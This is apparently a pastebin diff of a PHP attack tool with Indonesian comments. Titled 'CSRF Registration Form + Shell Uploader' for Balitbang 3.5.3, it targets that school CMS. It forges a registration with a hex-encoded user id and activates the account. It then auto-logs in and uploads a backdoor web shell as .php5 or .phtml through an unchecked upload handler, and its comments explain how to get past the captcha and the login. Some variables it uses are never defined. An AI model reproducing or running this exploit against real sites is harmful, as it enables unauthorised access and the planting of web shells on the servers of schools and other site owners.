View difference between Paste ID: <a href="/tymZBQEt">tymZBQEt</a> and <a href="/ZfHszHCQ">ZfHszHCQ</a>

<html>
1		<html>
2		<!---
3		// script ini dibuat berdasarkan iseng saja... :)
4		// by. kitasemua
5		// --------------------------
6		// Simpan script ini dengan nama: test.php
7		// - Jika captcha tidak muncul, buka inspect element, arahin cursor ke captcha, ganti link captcha "/functions/captcha/captcha.php" -> "/functions/spam.php"
8		// - Jika bypass login gagal, silahkan login manual, kemudian lanjut upload shellnya
9		// - Format shell: .phtml, .php5
10		// --------------------------
11		// Bugs terletak pada /functons/simmateri.php dan /functions/simmateriguru.php
12		// Cara menutup bugs ini: gunakan fungsi batasan ekstensi file seperti di /functions/simlapguru.php
13		// --------------------------
14		// Tunggu Tutorial selanjutnya "Bypass $_SESSION untuk Lokomedia, Balitbang, F0rmulaCMS".
15		// --------------------------
16		-->
17		<head>
18		<title>Balitbang 3.5.3</title>
19		</head>
20		<style type="text/css">
21		input[type=text],input[type=code],input[type=password]{
22		border:1px solid #c0c0c0;
23		height:24px;
24		padding:5px;
25		}
26		body {
27		background-color: black;
28		color: #fff;
29		}
30		</style>
31		<body>
32		<?php
33		function hex($str='',$code='') {
34		if(($code>=0)and($code<100)) {
35		$t .=dechex(strlen($str)+$code)."g";
36		$str=strrev($str);
37		for($i=0;$i<=strlen($str)-1;$i++) {
38		$t .=dechex(ord(substr($str,$i,1))+$code);
39		}
40		}
41		return $t;
42		}
43		function unhex($str='',$code='') {
44		$all=explode("g",$str);
45		$head=hexdec($all[0])-$code;
46		$content=$all[1];
47		if($head==(strlen($content)/2)) {
48		for($i=0;$i<=$head-1;$i++) {
49		$t .=chr(hexdec(substr($content,$i*2,2))-$code);
50		}
51	-	$target = $_GET['target'];
51	+
52		}
53		return $t;
54		}
55		$target = @$_GET['target'];
56	-	$userx = $_GET['n'];
56	+
57	-	$passx = $_GET['p'];
57	+
58		$captcha = $target."/functions/captcha/captcha.php";
59		$ur_login = $target."/member/ajax_login.php";
60		$userx = @$_GET['n'];
61		$passx = @$_GET['p'];
62		if(isset($_POST['next'])){
63		$tar = $_POST['tar'];
64		$n = $_POST['n'];
65		$p = $_POST['p'];
66		header("Location: test.php?load=daftar&n=".$n."&p=".$p."&target=".$tar."");
67		}
68		echo "CSRF Regstration Form + Shell Uploader (Balitbang 3.5.3) <br>
69		<hr>";
70		?>
71		<form method="post" action="" enctype="multipart/form-data">
72		<table id=tablebaru cellspacing='1' cellpadding='3'>
73		<tr>
74		<td>target</td>
75		<td>:</td>
76		<td><input type="text" name="tar" size="61" placeholder='http://'/></td>
77		</tr>
78		<tr>
79		<td>username</td>
80		<td>:</td>
81		<td><input type="text" name="n" size="61"/></td>
82		</tr>
83		<tr>
84		<td>password</td>
85		<td>:</td>
86		<td><input type="text" name="p" size="61"/></td>
87		</tr>
88		<tr>
89		<td></td>
90		<td></td>
91		<td><input type="submit" name="next" value="NEXT »"/></td>
92		</tr>
93		</table>
94		</form>
95		<hr>
96		<?php if(isset($_GET['load']) && $_GET['load'] == "daftar"){
97		$asli = hex($userx,"82");
98		$pass = hex($passx,"82");
99		echo "username : <b>$userx</b><br>";
100		echo "password : <b>$passx</b><hr>";
101		?>
102		<form name='formID' action="<?php echo $ur_target;?>" method='post' target='iframe'>
103		<input type=hidden name='userid' value='<?php echo hex("simtambah,","82");?>'>
104		<input type=hidden name='name' value='ganteng'/>
105		<input type=hidden name='username' value='<?php echo $userx;?>'/>
106		<input type=hidden name='password' value='<?php echo $passx;?>'/>
107		<input type=hidden name='email' value='abc@abc.abc'/>
108		<input type=hidden name='kelamin' value='m'/>
109		<input type=hidden name='jenis' value='Tamu'>
110		<input type=hidden name='kelas' value=''/>
111		<input type=hidden name='hari' value='01'/>
112		<input type=hidden name='bulan' value='01'/>
113		<input type=hidden name='tahun' value='1995'/>
114		<input type=hidden name='nis' value=''/>
115		<input type=hidden name='pertanyaan' value='1'/>
116		<input type=hidden name='jawaban' value='1'/>
117		<input type=hidden name='kerja' value='Guru'/>
118		<input type=hidden name='alamat' value='jauh'/>
119		<input type=hidden name='sekolah' value='terserah'/>
120		<input type=hidden name='telp' value='0'/>
121		<input type=hidden name='blog' value=''/>
122		<input type=hidden name='tentang' value='terserah'/>
123		<input type=hidden name='country' value='INDONESIA'/>
124		<input type=hidden name='stprofil' value='open'/>
125		<input type=hidden name='stblog' value='on'/>
126		<table>
127		<tr>
128		<td colspan="2" valign="top"><img src='<?php echo $captcha;?>' width='162' height="85"></td>
129		<td rowspan="2" valign="top"><i>» capture target...</i><br><iframe name='iframe' width='310' height='90' style="border:1px solid #c0c0c0;"></iframe></td>
130		</tr>
131		<tr>
132		<td valign="top"><input type='text' name='code' size='12' placeholder="captcha"/></td>
133		<td valign="top"><input type=submit name='submit' value='GO »'/></td>
134		</tr>
135		</table>
136		</form>
137		<?php
138		echo "<!--
139		ini kode registrasinya: valid/index.php?id=".$asli."&p=".$pass."
140		-->
141		";
142		echo "Langkah selanjutnya:<br>1. Setelah registrasi berhasil, <input type='button' value='klik disini' onclick=\"verif.location.href='".$target."/valid/index.php?id=".$asli."&p=".$pass."'\"/> untuk aktivasi/verifikasi!.
143		<br><i>» capture target...</i><br><iframe name='verif' width='480' height='90' style='border:1px solid #c0c0c0;'></iframe><br>2. Langkah terakhir, Upload backdoornya <input type='button' onclick=\"window.location.href='test.php?load=upload&n=".$userx."&p=".$passx."&target=".$target."'\" value='lewat sini brade!!'/><hr>";
144		} else if(isset($_GET['load']) && $_GET['load'] == "upload"){
145		?>
146		<script type="text/javascript">
147		window.onload = function(){
148		document.forms['login_form'].submit()
149
150		}
151		function setURL(url){
152		document.getElementById('verif').src = url;
153		}
154		</script>
155		<form method="post" action="<?php echo $ur_login;?>" target='autologin' name='login_form'>
156		<input type='hidden' name='user_name' value="<?php echo $userx;?>"/>
157		<input type='hidden' name='password' value="<?php echo $passx;?>"/>
158		Jika tidak bisa login dihalaman member, <input type='submit' name='submit' value='Klik disini untuk bikin SESSION'/>
159		</form>
160		<div style='margin-top:-20px;'>
161		<iframe name='autologin' width='30' height='30' style="border:0;"></iframe>
162		</div>
163		<form action='<?php echo $ur_upload;?>' method='post' enctype="multipart/form-data" target='golink'>
164		<input type='hidden' name='pesan' value='abcabcabc'/></td>
165		<table cellspacing='1' cellpadding='3'>
166		<tr>
167		<td valign='top'>File</td>
168		<td valign='top'>:</td>
169		<td valign='top'><input type='file' name='file'></td>
170		<td valign='top' align='right'><input type='submit' value=' Simpan '/></td>
171		</tr>
172		<tr>
173		<td valign='top' colspan="4"><i>» capture target...</i><br><iframe name='golink' width='475' height='150' style="border:1px solid #c0c0c0;"></iframe></td>
174		</tr>
175		<tr>
176		<td valign='top' colspan="4">
177		hasil upload (.php5): <a href="<?php echo $target."/tugas/tgs-ganteng.php5";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.php5";?></a><br>
178		hasil upload (.phtml): <a href="<?php echo $target."/tugas/tgs-ganteng.phtml";?>" target="_blank"><?php echo $target."/tugas/tgs-ganteng.phtml";?></a></td>
179		</tr>
180		</table>
181		<input type=hidden name='st' value='ganteng'>
182		<input type=hidden name='nis' value=''>
183		<input type=hidden name='idtugas' value=''>
184		</form>
185		<hr>
186		<?php } ?>
187		</body>
188		</html>